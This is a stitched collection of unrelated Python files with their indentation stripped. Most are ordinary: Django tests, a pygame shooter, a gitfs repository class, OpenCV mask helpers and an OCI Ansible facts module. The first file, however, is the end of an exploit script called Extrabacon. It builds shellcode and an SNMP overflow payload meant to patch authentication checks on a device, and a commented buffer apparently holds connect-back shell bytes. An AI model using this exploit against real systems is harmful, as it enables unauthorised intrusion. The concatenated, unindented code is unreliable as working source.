pmcheck_bytes = sc.pmcheck_code
admauth_bytes = sc.admauth_code
preamble_snmp = ""
preamble_snmp += "49.219.49.246.49.201.49.192.96.49.210.128.197.16.128.194.7.4.125.80.187."
preamble_snmp += sc.pmcheck_bounds
preamble_snmp += ".205.128.88.187."
preamble_snmp += sc.admauth_bounds
preamble_snmp += ".205.128.199.5."
preamble_snmp += sc.pmcheck_offset
preamble_snmp += "."
preamble_snmp += pmcheck_bytes
preamble_snmp += ".199.5."
preamble_snmp += sc.admauth_offset
preamble_snmp += "."
preamble_snmp += admauth_bytes
preamble_snmp += ".97.104."
preamble_snmp += sc.saferet_offset
preamble_snmp += ".128.195.16.191.11.15.15.15.137.229.131.197."
preamble_snmp += sc.fix_ebp
preamble_snmp += ".204.195"
if self.params.mode == 'mettle':
preamble_snmp = "49.219.49.246.49.201.49.192.96.49.210."
buf = ""
#buf += "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd"
#buf += "\x80\x97\x5b\x68\x0a\x1e\x0a\x89\x66\x68\x11\x5c\x66"
#buf += "\x53\x89\xe1\x6a\x66\x58\x50\x51\x57\x89\xe1\x43\xcd"
#buf += "\x80\x5b\x99\xb6\x0c\xb0\x03\xcd\x80"#\xff\xe1"
for c in buf:
preamble_snmp += "%d." % int(binascii.hexlify(c), 16)
preamble_snmp += "97.104."
preamble_snmp += sc.saferet_offset
preamble_snmp += ".128.195.16.191.11.15.15.15.137.229.131.197.72.195"
wrapper = preamble_snmp
wrapper_len = len(wrapper.split('.'))
wrapper += ".144" * (82 - wrapper_len)
##
launcher = "139.124.36.20.139.7.255.224.144"
overflow = string.join([head, "95", wrapper, sc.jmp_esp_offset, launcher], ".")
## removed superfluous length checks
if len(overflow.split('.')) != 112:
print "[-] problem with overflow_len (%d != 112)" % overflow_len
sys.exit(1)
self.params.request_id = random.randint(0x80000, 0x1fffffff)
print "[+] random SNMP request-id %d" % self.params.request_id
# we don't need to fix the launcher offset, only build 1 packet
# also, we can remove the payload varbind
exba_msg = SNMP(version=self.params.version,
community=self.params.community,
PDU=SNMPbulk(id=ASN1_INTEGER(self.params.request_id),
max_repetitions=1,
varbindlist=[SNMPvarbind(oid=ASN1_OID(overflow))]
)
)
if self.params.verbose:
print "overflow (112): %s" % overflow
print "EXBA msg (%d): %s" % (len(exba_msg), binascii.hexlify(exba_msg[SNMP].__str__()))
##
if len(exba_msg) >= 512:
print "[-] final SNMP msg is too large (%d >= %d) abort" % (len(exba_msg), 512)
sys.exit(1)
##
##
##
ret_list = [exba_msg]
return(ret_list)
def post_exploit(self, response):
##
##
snmp = SNMP(response)
print "[+] response:"
snmp.show()
recv_id = int(snmp.PDU.id.val)
if recv_id == self.params.request_id:
print "[+] received SNMP id %d, matches random id sent, likely success" % recv_id
return True
else:
print "[-] received SNMP id %d, expecting %d, mismatch! This is probably bad" % (recv_id, self.params.request_id)
return False
if __name__ == '__main__':
exp = Extrabacon('Extrabacon', '1.1.0.1')
exp.launch(sys.argv)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# SPDX-License-Identifier: Apache-2.0
# SPDX-FileCopyrightText: © 2021 Massachusetts Institute of Technology.
# SPDX-FileCopyrightText: © 2021 Lee McCuller <mcculler@mit.edu>
# NOTICE: authors should document their contributions in concisely in NOTICE
# with details inline in source files, comments, and docstrings.
"""
"""
from .. import base
class Circulator4(base.OpticalObject):
"""
A perfect 4-port optical circulator. Cycles the optical ports A->B->C->D->A
"""
def port_chain(self, p, pname):
bmap = {
"+A-t": (None, "+B"),
"+B-t": (None, "+C"),
"+C-t": (None, "+D"),
"+D-t": (None, "+A"),
}.get(pname, None)
if bmap is not None:
return bmap
return super(Circulator4, self).port_chain(p, pname)
@classmethod
def visit_port_information(cls, manip):
manip.gen_optical_port("+A", "A")
manip.gen_optical_port("+B", "B")
manip.gen_optical_port("+C", "C")
manip.gen_optical_port("+D", "D")
return
def visit_matrix_algorithm_ACDC(self, manip):
manip.add_link("A!i", "B!o", 1)
manip.add_link("B!i", "C!o", 1)
manip.add_link("C!i", "D!o", 1)
manip.add_link("D!i", "A!o", 1)
return
def visit_mode_matching_linkage(self, manip):
manip.add_link("A!i", "B!o", None)
manip.add_link("B!i", "C!o", None)
manip.add_link("C!i", "D!o", None)
manip.add_link("D!i", "A!o", None)
return
|
file = open("nomes.txt", "r")
lines = file.readlines()
title = lines[0]
names = title.strip().split(",")
print(names)
for i in lines[1:]:
aux = i.strip().split(",")
print('{}{:>5}{:>8}'.format(aux[0], aux[1], aux[2]))
|
from http import HTTPStatus
from django.urls import reverse
from mock import patch
from core.tests import MarketAccessTestCase
class EditWTOStatusTestCase(MarketAccessTestCase):
@patch("utils.api.resources.APIResource.patch")
def test_empty_wto_has_been_notified_error(self, mock_patch):
response = self.client.post(
reverse(
"barriers:edit_wto_status", kwargs={"barrier_id": self.barrier["id"]}
),
)
assert response.status_code == HTTPStatus.OK
assert "form" in response.context
form = response.context["form"]
assert form.is_valid() is False
assert "wto_has_been_notified" in form.errors
assert "wto_should_be_notified" not in form.errors
assert mock_patch.called is False
@patch("utils.api.resources.APIResource.patch")
def test_empty_wto_should_be_notified_error(self, mock_patch):
response = self.client.post(
reverse(
"barriers:edit_wto_status", kwargs={"barrier_id": self.barrier["id"]}
),
data={"wto_has_been_notified": "no"},
)
assert response.status_code == HTTPStatus.OK
assert "form" in response.context
form = response.context["form"]
assert form.is_valid() is False
assert "wto_has_been_notified" not in form.errors
assert "wto_should_be_notified" in form.errors
assert mock_patch.called is False
@patch("utils.api.resources.APIResource.patch")
def test_success_wto_has_been_notified(self, mock_patch):
response = self.client.post(
reverse(
"barriers:edit_wto_status", kwargs={"barrier_id": self.barrier["id"]}
),
data={"wto_has_been_notified": "yes"},
)
assert response.status_code == HTTPStatus.FOUND
mock_patch.assert_called_with(
id=self.barrier["id"],
wto_profile={
"wto_has_been_notified": True,
"wto_should_be_notified": None,
},
)
@patch("utils.api.resources.APIResource.patch")
def test_success_should_be_notified(self, mock_patch):
response = self.client.post(
reverse(
"barriers:edit_wto_status", kwargs={"barrier_id": self.barrier["id"]}
),
data={"wto_has_been_notified": "no", "wto_should_be_notified": "yes"},
)
assert response.status_code == HTTPStatus.FOUND
mock_patch.assert_called_with(
id=self.barrier["id"],
wto_profile={
"wto_has_been_notified": False,
"wto_should_be_notified": True,
},
)
@patch("utils.api.resources.APIResource.patch")
def test_success_should_not_be_notified(self, mock_patch):
response = self.client.post(
reverse(
"barriers:edit_wto_status", kwargs={"barrier_id": self.barrier["id"]}
),
data={"wto_has_been_notified": "no", "wto_should_be_notified": "no"},
)
assert response.status_code == HTTPStatus.FOUND
mock_patch.assert_called_with(
id=self.barrier["id"],
wto_profile={
"wto_has_been_notified": False,
"wto_should_be_notified": False,
},
)
|
# %%
from time import time
from bullet import Bullet
import pygame
from setting import Settings
from plane import Plane
import game_func as gf
from pygame.sprite import Group
from 敌机 import Eplane
from game_stats import GameStats
from button import Button
from scoreboard import Scoreboard
import time
def run_game():
"""
Run the game
Args:
air_setting(Settings):The basic values of the game.
screen(Any):The values of screen.
play_button(Button):the play button
bullets(Group):the bullets of the plane.
eplanes(Group):the group of eplane
plane(Plane):some values and fuctions of plane.
eplane(Eplane):Enemy plane
stats=(GameStats):data of the game
score_board(Scoreboard):The scoring
"""
pygame.init()
pygame.mixer.init()
pygame.mixer.music.load('resources/sound/game_music.wav')
pygame.mixer.music.play(-1, 0.0)
pygame.mixer.music.set_volume(0.25)
air_settings=Settings()
screen=pygame.display.set_mode((air_settings.screen_width,air_settings.screen_height))
pygame.display.set_caption("Aircraft Battle")
play_button = Button(air_settings, screen, "Play")
bullets=Group()
eplanes=Group()
plane=Plane(screen,air_settings)
eplane=Eplane(air_settings,screen)
enemy_frequency=0
stats=GameStats(air_settings)
score_board = Scoreboard(air_settings, screen, stats)
while True:
gf.check_events(plane,air_settings,screen,bullets, stats, play_button,eplanes,score_board)
if stats.game_active:
if enemy_frequency % 200 == 0:
gf.creat_eplane(air_settings,screen,eplanes)
enemy_frequency += 1
if enemy_frequency >= 100:
enemy_frequency = 0
plane.update()
gf.update_bullets(bullets,eplanes,air_settings, screen, plane, stats, score_board)
gf.update_eplanes(air_settings,eplanes,plane,stats,screen,bullets, score_board)
gf.update_screen(screen,air_settings.bg_color,plane,bullets,eplanes, stats, play_button, score_board)
run_game()
|
from flytekitplugins.spark import Spark
from mock import MagicMock
from flytekit import task
from flytekit.configuration import Config, SerializationSettings
from flytekit.remote.remote import FlyteRemote
def test_spark_template_with_remote():
@task(task_config=Spark(spark_conf={"spark": "1"}))
def my_spark(a: str) -> int:
return 10
@task
def my_python_task(a: str) -> int:
return 10
remote = FlyteRemote(
config=Config.for_endpoint(endpoint="localhost", insecure=True), default_project="p1", default_domain="d1"
)
mock_client = MagicMock()
remote._client = mock_client
remote.register_task(
my_spark,
serialization_settings=SerializationSettings(
image_config=MagicMock(),
),
version="v1",
)
serialized_spec = mock_client.create_task.call_args.kwargs["task_spec"]
print(serialized_spec)
# Check if the serialized spark task has mainApplicaitonFile field set.
assert serialized_spec.template.custom["mainApplicationFile"]
assert serialized_spec.template.custom["sparkConf"]
remote.register_task(
my_python_task, serialization_settings=SerializationSettings(image_config=MagicMock()), version="v1"
)
serialized_spec = mock_client.create_task.call_args.kwargs["task_spec"]
# Check if the serialized python task has no mainApplicaitonFile field set by default.
assert serialized_spec.template.custom is None
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
from telemetry.page import shared_page_state
class FlingGestureSupportedSharedState(shared_page_state.SharedPageState):
def CanRunOnBrowser(self, browser_info):
if not browser_info.HasFlingGestureSupport():
logging.warning('Browser does not support fling gestures, skipping test')
return False
return True
|
from django.conf import settings
# max number of objects to return
DEFAULT_PAGE_SIZE = getattr(settings, "ZAPIER_TRIGGER_DEFAULT_PAGE_SIZE", 25)
|
# Copyright 2014-2016 Presslabs SRL
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from collections import namedtuple
from shutil import rmtree
from stat import S_IFDIR, S_IFREG, S_IFLNK
from pygit2 import (
clone_repository,
Signature,
GIT_SORT_TOPOLOGICAL,
GIT_FILEMODE_TREE,
GIT_STATUS_CURRENT,
GIT_FILEMODE_LINK,
GIT_FILEMODE_BLOB,
GIT_BRANCH_REMOTE,
GIT_BRANCH_LOCAL,
GIT_FILEMODE_BLOB_EXECUTABLE,
)
from six import iteritems
from gitfs.cache import CommitCache
from gitfs.log import log
from gitfs.utils.path import split_path_into_components
from gitfs.utils.commits import CommitsList
DivergeCommits = namedtuple(
"DivergeCommits", ["common_parent", "first_commits", "second_commits"]
)
class Repository(object):
def __init__(self, repository, commits=None):
self._repo = repository
self.commits = commits or CommitCache(self)
self.behind = False
def __getitem__(self, item):
"""
Proxy method for pygit2.Repository
"""
return self._repo[item]
def __getattr__(self, attr):
"""
Proxy method for pygit2.Repository
"""
if attr not in self.__dict__:
return getattr(self._repo, attr)
else:
return self.__dict__[attr]
def ahead(self, upstream, branch):
ahead, _ = self.diverge(upstream, branch)
return ahead
def diverge(self, upstream, branch):
reference = "{}/{}".format(upstream, branch)
remote_branch = self._repo.branches.remote.get(reference)
local_branch = self._repo.branches.local.get(branch)
# TODO: check for missing branches
if remote_branch.target == local_branch.target:
return False, False
diverge_commits = self.find_diverge_commits(local_branch, remote_branch)
behind = len(diverge_commits.second_commits) > 0
ahead = len(diverge_commits.first_commits) > 0
return ahead, behind
def checkout(self, ref, *args, **kwargs):
result = self._repo.checkout(ref, *args, **kwargs)
# update ignore cache after a checkout
self.ignore.update()
status = self._repo.status()
for path, status in iteritems(status):
# path is in current status, move on
if status == GIT_STATUS_CURRENT:
continue
# check if file exists or not
full_path = self._full_path(path)
if path not in self._repo.index:
if path not in self.ignore:
try:
os.unlink(full_path)
except OSError:
# path points to a directory containing untracked files
rmtree(
full_path,
onerror=lambda function, fpath, excinfo: log.info(
"Repository: Checkout couldn't delete %s", fpath
),
)
continue
# check files stats
stats = self.get_git_object_default_stats(ref, path)
current_stat = os.lstat(full_path)
if stats["st_mode"] != current_stat.st_mode:
try:
os.chmod(full_path, current_stat.st_mode)
except OSError:
log.info("Repository: Checkout couldn't chmod %s", full_path)
self._repo.index.add(self._sanitize(path))
return result
def _sanitize(self, path):
if path is not None and path.startswith("/"):
path = path[1:]
return path
def push(self, upstream, branch, credentials):
""" Push changes from a branch to a remote
Examples::
repo.push("origin", "master")
"""
remote = self.get_remote(upstream)
remote.push(["refs/heads/%s" % branch], callbacks=credentials)
def fetch(self, upstream, branch_name, credentials):
"""
Fetch from remote and return True if we are behind or False otherwise
"""
remote = self.get_remote(upstream)
remote.fetch(callbacks=credentials)
_, behind = self.diverge(upstream, branch_name)
self.behind = behind
return behind
def commit(self, message, author, commiter, parents=None, ref="HEAD"):
""" Wrapper for create_commit. It creates a commit from a given ref
(default is HEAD)
"""
status = self._repo.status()
if status == {}:
return None
# sign the author
author = Signature(author[0], author[1])
commiter = Signature(commiter[0], commiter[1])
# write index localy
tree = self._repo.index.write_tree()
self._repo.index.write()
# get parent
if parents is None:
parents = [self._repo.revparse_single(ref).id]
return self._repo.create_commit(ref, author, commiter, message, tree, parents)
@classmethod
def clone(cls, remote_url, path, branch=None, credentials=None):
"""Clone a repo in a give path and update the working directory with
a checkout to head (GIT_CHECKOUT_SAFE_CREATE)
:param str remote_url: URL of the repository to clone
:param str path: Local path to clone into
:param str branch: Branch to checkout after the
clone. The default is to use the remote's default branch.
"""
try:
repo = clone_repository(
remote_url, path, checkout_branch=branch, callbacks=credentials
)
except Exception as e:
log.error("Error on cloning the repository: ", exc_info=True)
repo.checkout_head()
return cls(repo)
def _is_searched_entry(self, entry_name, searched_entry, path_components):
"""
Checks if a tree entry is the one that is being searched for. For
that, the name has to correspond and it has to be the last element
in the path_components list (this means that the path corresponds
exactly).
:param entry_name: the name of the tree entry
:param searched_entry: the name of the object that is being searched
for
:type searched_entry: str
:param path_components: the path of the object being searched for
:type path_components: list
"""
return (
entry_name == searched_entry
and len(path_components) == 1
and entry_name == path_components[0]
)
def _get_git_object(self, tree, obj_name, path_components, modifier):
"""
It recursively searches for the object in the repository. To declare
an object as found, the name and the relative path have to correspond.
It also includes the relative path as a condition for success, to avoid
finding an object with the correct name but with a wrong location.
:param tree: a `pygit2.Tree` instance
:param entry_name: the name of the object
:type entry_name: str
:param path_components: the path of the object being searched for as
a list (e.g: for '/a/b/c/file.txt' => ['a', 'b', 'c', 'file.txt'])
:type path_components: list
:param modifier: a function used to retrieve some specific
characteristic of the git object
:type modifier: function
:returns: an instance corresponding to the object that is being
searched for in case of success, or None otherwise.
:rtype: one of the following:
an instance of `pygit2.Tree`
an instance of `pygit2.Blob`
None
"""
git_obj = None
for entry in tree:
if self._is_searched_entry(entry.name, obj_name, path_components):
return modifier(entry)
elif entry.filemode == GIT_FILEMODE_TREE:
git_obj = self._get_git_object(
self._repo[entry.id], obj_name, path_components[1:], modifier
)
if git_obj:
return git_obj
return git_obj
def get_git_object_type(self, tree, path):
"""
Returns the filemode of the git object with the relative path <path>.
:param tree: a `pygit2.Tree` instance
:param path: the relative path of the object
:type entry_name: str
:returns: the filemode for the entry in case of success
(which can be one of the following) or None otherwise.
0 (0000000) GIT_FILEMODE_NEW
16384 (0040000) GIT_FILEMODE_TREE
33188 (0100644) GIT_FILEMODE_BLOB
33261 (0100755) GIT_FILEMODE_BLOB_EXECUTABLE
40960 (0120000) GIT_FILEMODE_LINK
57344 (0160000) GIT_FILEMODE_COMMIT
:rtype: int, None
"""
path_components = split_path_into_components(path)
try:
return self._get_git_object(
tree, path_components[-1], path_components, lambda entry: entry.filemode
)
except:
return GIT_FILEMODE_TREE
def get_git_object(self, tree, path):
"""
Returns the git object with the relative path <path>.
:param tree: a `pygit2.Tree` instance
:param path: the relative path of the object
:type path: str
:returns: an instance corresponding to the object that is being
searched for in case of success, or None else.
:rtype: one of the following:
an intance of `pygit2.Tree`
an intance of `pygit2.Blob`
None
"""
# It acts as a proxy for the _get_git_object method, which
# does the actual searching.
path_components = split_path_into_components(path)
return self._get_git_object(
tree,
path_components[-1],
path_components,
lambda entry: self._repo[entry.id],
)
def get_git_object_default_stats(self, ref, path):
types = {
GIT_FILEMODE_LINK: {"st_mode": S_IFLNK | 0o444},
GIT_FILEMODE_TREE: {"st_mode": S_IFDIR | 0o555, "st_nlink": 2},
GIT_FILEMODE_BLOB: {"st_mode": S_IFREG | 0o444},
GIT_FILEMODE_BLOB_EXECUTABLE: {"st_mode": S_IFREG | 0o555},
}
if path == "/":
return types[GIT_FILEMODE_TREE]
obj_type = self.get_git_object_type(ref, path)
if obj_type is None:
return obj_type
stats = types[obj_type]
if obj_type in [GIT_FILEMODE_BLOB, GIT_FILEMODE_BLOB_EXECUTABLE]:
stats["st_size"] = self.get_blob_size(ref, path)
return stats
def get_blob_size(self, tree, path):
"""
Returns the size of a the data contained by a blob object
with the relative path <path>.
:param tree: a `pygit2.Tree` instance
:param path: the relative path of the object
:type path: str
:returns: the size of data contained by the blob object.
:rtype: int
"""
return self.get_git_object(tree, path).size
def get_blob_data(self, tree, path):
"""
Returns the data contained by a blob object with the relative
path <path>.
:param tree: a `pygit2.Tree` instance
:param path: the relative path of the object
:type path: str
:returns: the data contained by the blob object.
:rtype: str
"""
return self.get_git_object(tree, path).data
def get_commit_dates(self):
"""
Walk through all commits from current repo in order to compose the
_history_ directory.
"""
return list(self.commits.keys())
def get_commits_by_date(self, date):
"""
Retrieves all the commits from a particular date.
:param date: date with the format: yyyy-mm-dd
:type date: str
:returns: a list containg the commits for that day. Each list item
will have the format: hh:mm:ss-<short_sha1>, where short_sha1 is
the short sha1 of the commit (first 10 characters).
:rtype: list
"""
return list(map(str, self.commits[date]))
def walk_branches(self, sort, *branches):
"""
Simple iterator which take a sorting strategy and some branch and
iterates through those branches one commit at a time, yielding a list
of commits
:param sort: a sorting option `GIT_SORT_NONE, GIT_SORT_TOPOLOGICAL,
GIT_SORT_TIME, GIT_SORT_REVERSE`. Default is 'GIT_SORT_TOPOLOGICAL'
:param branches: branch to iterate through
:type branches: list
:returns: yields a list of commits corresponding to given branches
:rtype: list
"""
iterators = [iter(self._repo.walk(branch.target, sort)) for branch in branches]
stop_iteration = [False for branch in branches]
commits = []
for iterator in iterators:
try:
commit = next(iterator)
except StopIteration:
commit = None
commits.append(commit)
yield (commit for commit in commits)
while not all(stop_iteration):
for index, iterator in enumerate(iterators):
try:
commit = next(iterator)
commits[index] = commit
except StopIteration:
stop_iteration[index] = True
if not all(stop_iteration):
yield (commit for commit in commits)
def remote_head(self, upstream, branch):
ref = "%s/%s" % (upstream, branch)
remote = self._repo.lookup_branch(ref, GIT_BRANCH_REMOTE)
return remote.get_object()
def get_remote(self, name):
""" Retrieve a remote by name. Raise a ValueError if the remote was not
added to repo
Examples::
repo.get_remote("fork")
"""
remote = [remote for remote in self._repo.remotes if remote.name == name]
if not remote:
raise ValueError("Missing remote")
return remote[0]
def _full_path(self, partial):
if partial.startswith("/"):
partial = partial[1:]
return os.path.join(self._repo.workdir, partial)
def find_diverge_commits(self, first_branch, second_branch):
"""
Take two branches and find diverge commits.
2--3--4--5
/
1--+ Return:
\ - common parent: 1
6 - first list of commits: (2, 3, 4, 5)
- second list of commits: (6)
:param first_branch: first branch to look for common parent
:type first_branch: `pygit2.Branch`
:param second_branch: second branch to look for common parent
:type second_branch: `pygit2.Branch`
:returns: a namedtuple with common parent, a list of first's branch
commits and another list with second's branch commits
:rtype: DivergeCommits (namedtuple)
"""
common_parent = None
first_commits = CommitsList()
second_commits = CommitsList()
walker = self.walk_branches(GIT_SORT_TOPOLOGICAL, first_branch, second_branch)
for first_commit, second_commit in walker:
if first_commit in second_commits or second_commit in first_commits:
break
if first_commit not in first_commits:
first_commits.append(first_commit)
if second_commit not in second_commits:
second_commits.append(second_commit)
if second_commit.hex == first_commit.hex:
break
try:
index = second_commits.index(first_commit)
except ValueError:
pass
else:
second_commits = second_commits[:index]
common_parent = first_commit
try:
index = first_commits.index(second_commit)
except ValueError:
pass
else:
first_commits = first_commits[:index]
common_parent = second_commit
return DivergeCommits(common_parent, first_commits, second_commits)
|
import cv2
import numpy as np
from rob9Utils.affordancetools import getPredictedAffordances
def convexHullFromContours(contours):
""" Input:
contours - list [cv2 contours]
Output:
hulls - list [N, cv2 hulls]
"""
hulls = []
for contour in contours:
hulls.append(cv2.convexHull(contour, False))
return hulls
def maskFromConvexHull(height, width, hulls):
""" Input:
height - int
width - int
hulls - cv2 hulls
Output:
im - np.array, bool, shape (h, w)
"""
im = np.zeros((height, width))
for i in range(len(hulls)):
cv2.drawContours(im, hulls, i, (255, 255, 255), -1)
return im.astype(np.bool)
def thresholdMaskBySize(mask, threshold = 0.05):
""" input:
mask - binary mask of shape (h, w)
threshold - threshold as total percentage of mask size
output:
mask_percentage_of_object - float, percentage size
keep - boolean
"""
size = mask.shape[0] * mask.shape[1]
occurences = np.count_nonzero(mask == True)
mask_percentage_of_object = occurences / size
keep = True
if mask_percentage_of_object < threshold:
keep = False
return mask_percentage_of_object, keep
def removeOverlapMask(masks):
""" Sets the pixels of intersection of unions of masks to 0
Input:
masks - np.array, shape (affordances, h, w)
Output:
masks - np.array, shape (affordances, h, w)
"""
unique_affordances = getPredictedAffordances(masks)
for i in range(len(unique_affordances)):
for j in range(i + 1, len(unique_affordances)):
overlap = masks[unique_affordances[i]] == masks[unique_affordances[j]]
masks[unique_affordances[i], overlap] = False
masks[unique_affordances[j], overlap] = False
return masks
def keepLargestContour(contours):
""" Returns the largest contour in a list of cv2 contours
Input:
contours - list [cv2 contours]
Output:
[contour] - list with one item
"""
maxArea = 0
idx = 0
for count, contour in enumerate(contours):
area = cv2.contourArea(contour)
if area > maxArea:
maxArea = area
idx = count
return [contours[idx]]
def erodeMask(affordance_id, masks, kernel):
m = masks[affordance_id, :, :]
m = cv2.erode(m, kernel)
masks[affordance_id] = m
return masks
|
from argparse import ArgumentParser
from logging import getLogger
from pathlib import Path
from tempfile import gettempdir
from pronunciation_dict_parser.app.common import \
add_default_output_formatting_arguments
from pronunciation_dict_parser.app.helper import save_dictionary_as_txt
from pronunciation_dict_parser.core.downloading import download
from pronunciation_dict_parser.core.public_dicts import PublicDictType
from pronunciation_dict_parser.core.types import Symbol
def get_downloading_parser(parser: ArgumentParser):
parser.description = ""
default_path = Path(gettempdir()) / "pronunciations.dict"
parser.add_argument("--path", metavar='PATH', type=Path,
help="file where to output pronunciation dictionary", default=default_path)
parser.add_argument("--dictionary", metavar='TYPE', choices=PublicDictType,
type=PublicDictType.__getitem__, default=PublicDictType.MFA_ARPA, help="pronunciation dictionary")
add_default_output_formatting_arguments(parser)
parser.add_argument("-o", "--overwrite", action="store_true",
help="overwrite file if it exists")
return app_download
def app_download(path: Path, dictionary: PublicDictType, pronunciation_sep: Symbol, symbol_sep: Symbol, include_counter: bool, only_first_pronunciation: bool, encoding: str, empty_symbol: Symbol, overwrite: bool):
if not overwrite and path.exists():
logger = getLogger(__name__)
logger.error("File already exists!")
return
pronunciation_dict = download(dictionary)
save_dictionary_as_txt(pronunciation_dict, path, encoding, pronunciation_sep,
symbol_sep, include_counter, only_first_pronunciation, empty_symbol)
logger = getLogger(__name__)
logger.info(f"Written dictionary to: {path}")
|
from django.contrib import admin
from .models import HomeBanner
# Register your models here.
@admin.register(HomeBanner)
class PromoCategoryAdmin(admin.ModelAdmin):
list_display = (
'id', 'describe', 'show_time', 'hide_time', 'banner_h5', 'script_h5', 'banner_pc', 'script_pc',
'sort')
search_fields = ('describe', 'show_time',)
|
#!/usr/bin/python
# Copyright (c) 2017, 2020 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_file_storage_snapshot_facts
short_description: Fetches details about one or multiple Snapshot resources in Oracle Cloud Infrastructure
description:
- Fetches details about one or multiple Snapshot resources in Oracle Cloud Infrastructure
- Lists snapshots of the specified file system.
- If I(snapshot_id) is specified, the details of a single Snapshot will be returned.
version_added: "2.9"
author: Oracle (@oracle)
options:
snapshot_id:
description:
- The OCID of the snapshot.
- Required to get a specific snapshot.
type: str
aliases: ["id"]
file_system_id:
description:
- The OCID of the file system.
- Required to list multiple snapshots.
type: str
lifecycle_state:
description:
- Filter results by the specified lifecycle state. Must be a valid
state for the resource type.
type: str
choices:
- "CREATING"
- "ACTIVE"
- "DELETING"
- "DELETED"
- "FAILED"
sort_order:
description:
- The sort order to use, either 'asc' or 'desc', where 'asc' is
ascending and 'desc' is descending. The default order is 'desc'
except for numeric values.
type: str
choices:
- "ASC"
- "DESC"
extends_documentation_fragment: [ oracle.oci.oracle, oracle.oci.oracle_name_option ]
"""
EXAMPLES = """
- name: List snapshots
oci_file_storage_snapshot_facts:
file_system_id: ocid1.filesystem.oc1..xxxxxxEXAMPLExxxxxx
- name: Get a specific snapshot
oci_file_storage_snapshot_facts:
snapshot_id: ocid1.snapshot.oc1..xxxxxxEXAMPLExxxxxx
"""
RETURN = """
snapshots:
description:
- List of Snapshot resources
returned: on success
type: complex
contains:
file_system_id:
description:
- The OCID of the file system from which the snapshot
was created.
returned: on success
type: string
sample: ocid1.filesystem.oc1..xxxxxxEXAMPLExxxxxx
id:
description:
- The OCID of the snapshot.
returned: on success
type: string
sample: ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx
lifecycle_state:
description:
- The current state of the snapshot.
returned: on success
type: string
sample: CREATING
name:
description:
- Name of the snapshot. This value is immutable.
- Avoid entering confidential information.
- "Example: `Sunday`"
returned: on success
type: string
sample: Sunday
time_created:
description:
- The date and time the snapshot was created, expressed
in L(RFC 3339,https://tools.ietf.org/rfc/rfc3339) timestamp format.
- "Example: `2016-08-25T21:10:29.600Z`"
returned: on success
type: string
sample: 2016-08-25T21:10:29.600Z
freeform_tags:
description:
- "Free-form tags for this resource. Each tag is a simple key-value pair
with no predefined name, type, or namespace.
For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
Example: `{\\"Department\\": \\"Finance\\"}`"
returned: on success
type: dict
sample: {'Department': 'Finance'}
defined_tags:
description:
- "Defined tags for this resource. Each key is predefined and scoped to a namespace.
For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
Example: `{\\"Operations\\": {\\"CostCenter\\": \\"42\\"}}`"
returned: on success
type: dict
sample: {'Operations': {'CostCenter': 'US'}}
sample: [{
"file_system_id": "ocid1.filesystem.oc1..xxxxxxEXAMPLExxxxxx",
"id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx",
"lifecycle_state": "CREATING",
"name": "Sunday",
"time_created": "2016-08-25T21:10:29.600Z",
"freeform_tags": {'Department': 'Finance'},
"defined_tags": {'Operations': {'CostCenter': 'US'}}
}]
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceFactsHelperBase,
get_custom_class,
)
try:
from oci.file_storage import FileStorageClient
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class SnapshotFactsHelperGen(OCIResourceFactsHelperBase):
"""Supported operations: get, list"""
def get_required_params_for_get(self):
return [
"snapshot_id",
]
def get_required_params_for_list(self):
return [
"file_system_id",
]
def get_resource(self):
return oci_common_utils.call_with_backoff(
self.client.get_snapshot, snapshot_id=self.module.params.get("snapshot_id"),
)
def list_resources(self):
optional_list_method_params = [
"lifecycle_state",
"sort_order",
"name",
]
optional_kwargs = dict(
(param, self.module.params[param])
for param in optional_list_method_params
if self.module.params.get(param) is not None
)
return oci_common_utils.list_all_resources(
self.client.list_snapshots,
file_system_id=self.module.params.get("file_system_id"),
**optional_kwargs
)
SnapshotFactsHelperCustom = get_custom_class("SnapshotFactsHelperCustom")
class ResourceFactsHelper(SnapshotFactsHelperCustom, SnapshotFactsHelperGen):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec()
module_args.update(
dict(
snapshot_id=dict(aliases=["id"], type="str"),
file_system_id=dict(type="str"),
lifecycle_state=dict(
type="str",
choices=["CREATING", "ACTIVE", "DELETING", "DELETED", "FAILED"],
),
sort_order=dict(type="str", choices=["ASC", "DESC"]),
name=dict(type="str"),
)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_facts_helper = ResourceFactsHelper(
module=module,
resource_type="snapshot",
service_client_class=FileStorageClient,
namespace="file_storage",
)
result = []
if resource_facts_helper.is_get():
result = [resource_facts_helper.get()]
elif resource_facts_helper.is_list():
result = resource_facts_helper.list()
else:
resource_facts_helper.fail()
module.exit_json(snapshots=result)
if __name__ == "__main__":
main()
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
